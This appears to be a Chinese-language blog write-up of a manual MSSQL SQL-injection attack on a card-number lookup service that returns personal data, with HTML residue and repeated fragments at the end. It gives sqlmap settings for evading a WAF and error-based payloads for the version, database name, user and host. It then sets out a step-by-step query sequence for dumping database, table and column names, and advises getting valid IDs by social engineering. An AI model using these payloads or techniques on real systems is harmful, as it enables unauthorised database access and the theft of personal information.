MSSQL注入实战：从误区到突破<\/h1>

0x00 背景介绍<\/h2>
这是一次典型的MSSQL注入测试经历，作者通过自身实践展示了从工具使用到手工注入的全过程，特别记录了在测试过程中遇到的误区及突破方法。本案例涉及时间盲注、报错注入等技术，并重点分析了"出库不出表"现象的成因及解决方案。<\/p>

0x01 初步探测<\/h2>

目标系统特征<\/h3>

输入号码后系统会发起两个独立查询：

检查卡号是否存在（返回0或1）<\/li>
查询卡号对应的个人信息<\/li> <\/ol> <\/li>

初步判断存在数据库查询操作<\/li> <\/ul>

自动化工具测试<\/h3>

使用sqlmap时的关键参数：<\/p>

--delay 10<\/span>          # 设置请求间隔，避免触发WAF<\/span>
<\/span><\/span>--time-sec 15<\/span>       # 时间盲注延时设置<\/span>
<\/span><\/span>--timeout 20<\/span>        # 超时设置<\/span>
<\/span><\/span>--tamper            # 使用混淆脚本绕过防护<\/span>
<\/span><\/span><\/code><\/pre>注意<\/strong>：自动化工具测试未发现注入点，可能原因：<\/p>

自带tamper脚本未能构造有效payload<\/li>
需要更精确的手工测试确定过滤规则<\/li>
<\/ol>
0x02 手工注入过程<\/h2>
数据库类型识别<\/h3>
尝试payload：<\/p>
'and @@version
' and @@version -- 
<\/code><\/pre>
返回语法错误，但通过报错信息可辅助判断数据库类型。<\/p>
有效payload构造<\/h3>
成功payload：<\/p>
' and @@version>0 and '1'='1
<\/code><\/pre>
原理<\/strong>：利用数据库查询优先级，内置函数优先执行<\/p>
数据库信息收集<\/h3>
确认数据库类型为MSSQL后，使用以下payload收集信息：<\/p>
and<\/span> db_name() ><\/span> 0<\/span> and<\/span> '1'<\/span>=<\/span>'1      -- 当前数据库名
<\/span><\/span><\/span>and user_name()>0 and '<\/span>1<\/span>'='<\/span>1<\/span>      -- 当前用户名
<\/span><\/span><\/span><\/span>and<\/span> @@<\/span>servername ><\/span>0<\/span> and<\/span> '1'<\/span>=<\/span>'1    -- 主机名
<\/span><\/span><\/span><\/code><\/pre>0x03 关键突破：AND与OR逻辑差异<\/h2>
现象描述<\/h3>
进行到爆表阶段时，发现无论怎么构造payload都没有回显，疑似"出库不出表"现象。<\/p>
根本原因分析<\/h3>


系统两个查询独立：<\/p>

查询1：检查ID是否存在（返回0或1）<\/li>
查询2：查询ID对应信息（存在则返回数据，不存在返回空数组[]）<\/li>
<\/ul>
<\/li>

逻辑连接词影响：<\/p>

OR连接<\/strong>：无论ID查询结果是0还是1，都会触发后续比较操作<\/li>
AND连接<\/strong>：

ID查询为0 → 整个条件为0，不执行后续比较<\/li>
ID查询为1 → 执行后续比较，可能触发报错<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
解决方案<\/h3>
使用存在的用户ID（可通过社会工程学获取）确保查询1返回1，使AND连接的后续条件能够执行。<\/p>
0x04 完整注入流程<\/h2>
1. 爆数据库名<\/h3>
and<\/span> (SELECT<\/span> top 1<\/span> Name FROM<\/span> Master..SysDatabases) ><\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>2. 爆表名<\/h3>
and<\/span> (select<\/span> top 1<\/span> name from<\/span> [数据库名<\/span>].sys.all_objects where<\/span> type<\/span>=<\/span>'U'<\/span> AND<\/span> is_ms_shipped=<\/span>0<\/span>) ><\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>3. 爆字段名<\/h3>
and<\/span> (select<\/span> top 1<\/span> COLUMN_NAME<\/span> from<\/span> [数据库名<\/span>].information_schema.columns where<\/span> TABLE_NAME<\/span>=<\/span>'表名'<\/span>) ><\/span> 0<\/span>
<\/span><\/span><\/code><\/pre>0x05 经验总结<\/h2>

理解查询流程<\/strong>：明确系统各查询环节的独立性及逻辑关系<\/li>
注意连接词选择<\/strong>：AND\/OR对注入结果有决定性影响<\/li>
合理使用社会工程学<\/strong>：获取有效ID可大幅提高注入成功率<\/li>
报错信息利用<\/strong>：即使语法错误，报错信息也可能包含有价值线索<\/li>
优先级利用<\/strong>：数据库内置函数执行优先级高于常规查询<\/li>
<\/ol>
0x06 参考资源<\/h2>
MSSQL注入速查表<\/a><\/p>

MSSQL注入实战：从误区到突破<\/h1>

0x01 初步探测<\/h2>

0x02 手工注入过程<\/h2>

0x03 关键突破：AND与OR逻辑差异<\/h2>

现象描述<\/h3> 进行到爆表阶段时，发现无论怎么构造payload都没有回显，疑似"出库不出表"现象。<\/p>

解决方案<\/h3> 使用存在的用户ID（可通过社会工程学获取）确保查询1返回1，使AND连接的后续条件能够执行。<\/p>

0x04 完整注入流程<\/h2>

0x06 参考资源<\/h2> MSSQL注入速查表<\/a><\/p>

现象描述<\/h3>
进行到爆表阶段时，发现无论怎么构造payload都没有回显，疑似"出库不出表"现象。<\/p>

解决方案<\/h3>
使用存在的用户ID（可通过社会工程学获取）确保查询1返回1，使AND连接的后续条件能够执行。<\/p>

0x06 参考资源<\/h2>
MSSQL注入速查表<\/a><\/p>